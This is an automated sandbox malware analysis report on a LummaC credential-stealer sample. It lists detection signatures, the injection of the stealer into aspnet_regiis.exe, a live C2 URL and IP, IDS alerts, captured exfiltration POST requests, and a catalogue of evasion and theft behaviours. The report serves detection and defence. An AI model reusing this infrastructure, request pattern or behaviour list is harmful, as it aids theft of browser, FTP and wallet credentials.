Edit tour

Windows Analysis Report
S#U043eftWare.exe

Overview

General Information

Sample name:	S#U043eftWare.exe renamed because original name is a hash value
Original sample name:	SftWare.exe
Analysis ID:	1561496
MD5:	82c56f5e8dcae969405b4f02be0d785a
SHA1:	f5e9473db26e5dd800f780b02ccf15e7a66d0d48
SHA256:	d37859bc3d96d9dd1304fcb56a9e7225a31fa922e7b4945e7bb18e79fa09256c
Tags:	exeuser-4k95m
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

S#U043eftWare.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\S#U043eftWare.exe" MD5: 82C56F5E8DCAE969405B4F02BE0D785A)

conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 7700 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

WerFault.exe (PID: 7812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1228 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://property-imper.sbs:443/api", "Build Version": "yau6Na--6642475507"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: S#U043eftWare.exe PID: 7624	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7700	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7700	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7700	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:10:01.104987+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.33.116	443	TCP
2024-11-23T15:10:03.519144+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.33.116	443	TCP
2024-11-23T15:10:05.776218+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.33.116	443	TCP
2024-11-23T15:10:07.941534+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.33.116	443	TCP
2024-11-23T15:10:10.120985+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.33.116	443	TCP
2024-11-23T15:10:12.511308+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.33.116	443	TCP
2024-11-23T15:10:14.988079+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.33.116	443	TCP
2024-11-23T15:10:18.531857+0100	2028371	3	Unknown Traffic	192.168.2.4	49746	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:10:02.212063+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.33.116	443	TCP
2024-11-23T15:10:04.247214+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.33.116	443	TCP
2024-11-23T15:10:19.241279+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49746	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:10:02.212063+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:10:04.247214+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49732	104.21.33.116	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:10:08.719900+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49737	104.21.33.116	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\gdi32.dll

Avira: detection malicious, Label: HEUR/AGEN.1301971

Found malware configuration

Source: aspnet_regiis.exe.7700.2.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs:443/api", "Build Version": "yau6Na--6642475507"}

Multi AV Scanner detection for submitted file

Source: S#U043eftWare.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\gdi32.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: S#U043eftWare.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_00948BE3 CryptUnprotectData,

2_2_00948BE3

Source: S#U043eftWare.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49746 version: TLS 1.2

Source: S#U043eftWare.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %%.pdb source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, WER87AC.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbR source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER87AC.tmp.dmp.5.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\S#U043eftWare.PDB source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER87AC.tmp.dmp.5.dr
Source:	Binary string: C:\Users\user\Desktop\S#U043eftWare.PDB source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbL0 source: WER87AC.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbe source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 4x nop then mov esi, ebx	0_2_0051B040
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00552860
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-47412FB0h]	0_2_0052F110
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0052F110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, edx	2_2_0096D880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi-000000BEh]	2_2_0093A10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-43h]	2_2_00950970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, ebx	2_2_0093D2C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	2_2_00970620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edx+2EBA049Dh]	2_2_0093CE5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then lea eax, dword ptr [esp+3Ch]	2_2_0093C7A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00948BE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, esi	2_2_00970740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, eax	2_2_00970CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, eax	2_2_00935C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebp, eax	2_2_00935C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00953450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, ebx	2_2_00969040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0094AC64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp al, 5Ch	2_2_00932190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp dword ptr [00977FC4h]	2_2_00957580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-59BD808Dh]	2_2_00957580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00957580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp dword ptr [00975ED4h]	2_2_0093B989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_009531F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h	2_2_00956910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov bx, 0008h	2_2_00934930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	2_2_00934930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add eax, edx	2_2_00956959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h	2_2_00969290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, edx	2_2_0093BEB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-47412FB0h]	2_2_0094CED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0094CED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, ebx	2_2_00938E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+6FB81553h]	2_2_0094D201
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp dword ptr [00975ED4h]	2_2_0093B626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000F0h]	2_2_0093DA43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_0093EA4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ebp	2_2_009693D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, ecx	2_2_00951F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax+7035CC0Ch]	2_2_0094DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, esi	2_2_00955344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp dword ptr [00977FC4h]	2_2_00957774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00957774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_00952776

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49737 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.33.116:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://property-imper.sbs:443/api

Source: Joe Sandbox View

IP Address: 104.21.33.116 104.21.33.116

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.33.116:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: property-imper.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=64RCD7D2DYJM8YJNXNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: property-imper.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3UIS0B34M4H4WG9KY7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: property-imper.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CJJFV06MJVGS7NFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20424Host: property-imper.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5TETUHCUZXBZSQTUK6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1308Host: property-imper.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QV5928JTGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569006Host: property-imper.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: property-imper.sbs

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: property-imper.sbs

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs

Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/
Source: aspnet_regiis.exe, 00000002.00000003.1878990637.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/BW#?06
Source: aspnet_regiis.exe, 00000002.00000003.1878990637.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/U
Source: aspnet_regiis.exe, 00000002.00000003.1819263435.000000000070D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880620617.000000000070E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/api
Source: aspnet_regiis.exe, 00000002.00000003.1879281479.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1879487275.00000000006FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/api;
Source: aspnet_regiis.exe, 00000002.00000003.1878990637.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/l
